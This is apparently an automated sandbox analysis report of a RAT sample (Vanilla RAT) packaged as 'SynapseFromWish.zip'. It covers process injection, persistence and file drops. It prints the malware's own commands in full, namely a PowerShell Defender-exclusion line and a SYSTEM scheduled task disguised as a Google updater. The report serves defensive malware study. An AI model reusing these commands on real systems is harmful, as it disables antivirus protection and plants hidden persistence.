Analysis Overview
SHA256
4cf43fb3fd0c9512573a0f601f74101816706cc5e71470ab84e106cf29cbf589
Threat Level: Known bad
The file SynapseFromWish.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Vanillarat family
Vanilla Rat payload
VanillaRat
Vanilla Rat payload
Drops file in Drivers directory
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
Unsigned PE
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-09-12 08:29
Signatures
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vanillarat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win10v2004-20230831-en
Max time kernel
18s
Max time network
81s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3652 created 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 3652 created 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 3652 created 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 3652 created 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3652 set thread context of 1556 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\winlogon.exe |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\lsass.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3652 wrote to memory of 1556 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
| PID 1556 wrote to memory of 616 | N/A | C:\Windows\System32\dialer.exe | C:\Windows\system32\winlogon.exe |
| PID 936 wrote to memory of 3244 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe |
| PID 936 wrote to memory of 3244 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe |
| PID 1556 wrote to memory of 668 | N/A | C:\Windows\System32\dialer.exe | C:\Windows\system32\lsass.exe |
| PID 1556 wrote to memory of 964 | N/A | C:\Windows\System32\dialer.exe | C:\Windows\system32\svchost.exe |
| PID 668 wrote to memory of 2608 | N/A | C:\Windows\system32\lsass.exe | C:\Windows\sysmon.exe |
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 616 -ip 616
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 668 -ip 668
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 616 -s 864
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 668 -s 4260
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
Files
memory/3652-0-0x00007FF7F14C0000-0x00007FF7F1AD7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mxioahv0.qnx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2476-7-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/2476-6-0x000001B6C8700000-0x000001B6C8722000-memory.dmp
memory/2476-8-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-13-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-14-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-15-0x000001B6C8730000-0x000001B6C8740000-memory.dmp
memory/2476-18-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/1556-21-0x00007FFF312D0000-0x00007FFF314C5000-memory.dmp
memory/1556-22-0x00007FFF2F380000-0x00007FFF2F43E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3516-25-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/3516-24-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/3516-26-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/668-40-0x00000288696A0000-0x00000288696C7000-memory.dmp
memory/668-43-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/668-45-0x00000288696A0000-0x00000288696C7000-memory.dmp
memory/616-42-0x00007FFF3136D000-0x00007FFF3136E000-memory.dmp
memory/616-39-0x0000020EE5AB0000-0x0000020EE5AD7000-memory.dmp
memory/616-27-0x0000020EE5A80000-0x0000020EE5AA1000-memory.dmp
memory/3652-50-0x00007FF7F14C0000-0x00007FF7F1AD7000-memory.dmp
memory/964-47-0x000001B66BDD0000-0x000001B66BDF7000-memory.dmp
memory/384-48-0x0000020CF4160000-0x0000020CF4187000-memory.dmp
memory/668-53-0x00007FFF3136D000-0x00007FFF3136E000-memory.dmp
memory/668-57-0x00007FFF3136F000-0x00007FFF31370000-memory.dmp
memory/540-56-0x00000298C6980000-0x00000298C69A7000-memory.dmp
memory/384-52-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/964-51-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/964-59-0x000001B66BDD0000-0x000001B66BDF7000-memory.dmp
memory/384-61-0x0000020CF4160000-0x0000020CF4187000-memory.dmp
memory/964-62-0x00007FFF3136C000-0x00007FFF3136D000-memory.dmp
memory/540-58-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/540-63-0x00000298C6980000-0x00000298C69A7000-memory.dmp
memory/700-67-0x00000174C17C0000-0x00000174C17E7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
memory/700-68-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/3516-70-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/1040-74-0x000001BDB7F40000-0x000001BDB7F67000-memory.dmp
memory/1556-77-0x00007FF72C450000-0x00007FF72C479000-memory.dmp
memory/1052-80-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1052-75-0x000001B9EAFD0000-0x000001B9EAFF7000-memory.dmp
memory/1040-78-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1192-85-0x0000016D3F190000-0x0000016D3F1B7000-memory.dmp
memory/1216-90-0x000001AA21E60000-0x000001AA21E87000-memory.dmp
memory/1120-91-0x000001D469FD0000-0x000001D469FF7000-memory.dmp
memory/1192-94-0x0000016D3F190000-0x0000016D3F1B7000-memory.dmp
memory/1216-92-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1052-87-0x000001B9EAFD0000-0x000001B9EAFF7000-memory.dmp
memory/1192-89-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1120-83-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1040-82-0x000001BDB7F40000-0x000001BDB7F67000-memory.dmp
memory/1120-79-0x000001D469FD0000-0x000001D469FF7000-memory.dmp
memory/616-98-0x0000020EE5AB0000-0x0000020EE5AD7000-memory.dmp
memory/1216-96-0x000001AA21E60000-0x000001AA21E87000-memory.dmp
memory/1252-105-0x0000024C9E160000-0x0000024C9E187000-memory.dmp
memory/668-114-0x00000288696A0000-0x00000288696C7000-memory.dmp
memory/3516-110-0x00007FFF11CB0000-0x00007FFF12771000-memory.dmp
memory/1388-109-0x000001AB3CDB0000-0x000001AB3CDD7000-memory.dmp
memory/1252-108-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1372-111-0x00007FFEF1350000-0x00007FFEF1360000-memory.dmp
memory/1372-106-0x0000025AAA2C0000-0x0000025AAA2E7000-memory.dmp
memory/3516-115-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/3516-120-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
memory/1252-131-0x0000024C9E160000-0x0000024C9E187000-memory.dmp
memory/1372-140-0x0000025AAA2C0000-0x0000025AAA2E7000-memory.dmp
memory/1388-142-0x000001AB3CDB0000-0x000001AB3CDD7000-memory.dmp
memory/1460-127-0x000001CD86290000-0x000001CD862B7000-memory.dmp
memory/1452-143-0x000001A706040000-0x000001A706067000-memory.dmp
memory/1604-144-0x0000019FB1740000-0x0000019FB1767000-memory.dmp
memory/1568-145-0x000002278F590000-0x000002278F5B7000-memory.dmp
memory/1648-154-0x000001F149ED0000-0x000001F149EF7000-memory.dmp
memory/700-150-0x00000174C17C0000-0x00000174C17E7000-memory.dmp
memory/1784-159-0x000002510DB40000-0x000002510DB67000-memory.dmp
memory/1688-163-0x00000209F7A90000-0x00000209F7AB7000-memory.dmp
memory/1896-169-0x000002AE98CB0000-0x000002AE98CD7000-memory.dmp
memory/1908-174-0x0000012919B30000-0x0000012919B57000-memory.dmp
memory/1800-181-0x000001EA6B170000-0x000001EA6B197000-memory.dmp
memory/1952-178-0x0000023418960000-0x0000023418987000-memory.dmp
memory/1040-187-0x000001BDB7F40000-0x000001BDB7F67000-memory.dmp
memory/1964-184-0x000001C89C090000-0x000001C89C0B7000-memory.dmp
memory/3516-188-0x0000022D3AD70000-0x0000022D3AD80000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:31
Platform
win7-20230831-en
Max time kernel
112s
Max time network
113s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2948 created 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\perfc00C.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc011.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh009.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc010.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\PerfStringBackup.TMP | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc007.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc009.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh010.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfc00A.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh00A.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh00C.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\perfh011.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\system32\PerfStringBackup.INI | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\perfh007.dat | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2948 set thread context of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\inf\WmiApRpl\WmiApRpl.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File opened for modification | C:\Windows\inf\WmiApRpl\WmiApRpl.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\start.bat"
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
injector.exe
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
release-v2.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
